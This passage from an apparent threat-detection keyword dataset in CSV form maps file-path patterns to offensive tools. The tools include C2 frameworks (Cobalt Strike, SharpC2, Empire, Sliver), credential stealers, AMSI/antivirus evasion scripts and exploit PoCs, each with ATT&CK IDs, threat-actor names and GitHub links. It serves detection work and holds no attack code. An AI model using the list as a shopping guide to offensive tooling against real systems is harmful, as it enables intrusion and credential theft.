APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/C2Profiles/*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/C2script/*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*/C2Server.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/C2-Tool-Collection/*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*/cain.html*","offensive_tool_keyword","Cain&Abel","Cain & Able exploitation tool file ","T1075 - T1110 - T1071 - T1003 - T1555","TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md","1","1","N/A","N/A","8","745","233","2023-09-28T15:38:54Z","2021-05-11T12:38:17Z" +"*/campaign/*/implant/get_all*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/canary.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/CandyPotato.cpp*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" +"*/CandyPotato.sdf*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" +"*/CandyPotato.sln*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" +"*/CandyPotato.vcxproj*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" +"*/CapBypass.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*/carlosevieira/Dirty-Pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" +"*/cassandra-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cassandra-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cc2_frp.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*/cccam-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cerbrutus*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*/Certipy.git*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*/Certipy/*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*/CertStealer*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" +"*/certsync.git*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*/cfn__resource_injection_lambda*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ChainBuilder.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*/charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*/charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*/CheckPort.exe*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*/CheeseTools.git*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*/Chimera.git*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/Chimera.git*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*/chimera.py*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*/chimera.sh*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/chisel.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel.git*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel@latest*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-darwin_amd64*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-freebsd*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-linux_*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-master*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-windows_amd6*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chrisk44/*","offensive_tool_keyword","Github Username","Github username known for network exploitation tools","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/chrisk44/Hijacker","1","1","N/A","N/A","10","2213","435","2020-08-26T19:01:31Z","2016-11-25T01:39:07Z" +"*/chrome_decrypt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/ChromeDump/*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" +"*/chromium_based_browsers.py*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*/cics-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cics-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cics-user-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cics-user-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/CIMplant.exe*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*/CIMplant.git*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*/CIMplant/Commander.cs*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*/citrix-brute-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/citrix-enum-apps.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/citrix-enum-apps-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/citrix-enum-servers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/citrix-enum-servers-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/clamav-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/clickme.docx*","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","107","33","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" +"*/client/beef.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/client/bof/*.asm*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*/Client/Commands/Enumeration.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/Client/Commands/Execution.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/Client/Commands/Injection.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/Client/Commands/Lateral.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/Client/Commands/Tokens.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/client/generated-stagers/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/Client/Pages/Drones.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/Client/Pages/Payloads.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/Client/Pages/Pivots.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/clipboardinject.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 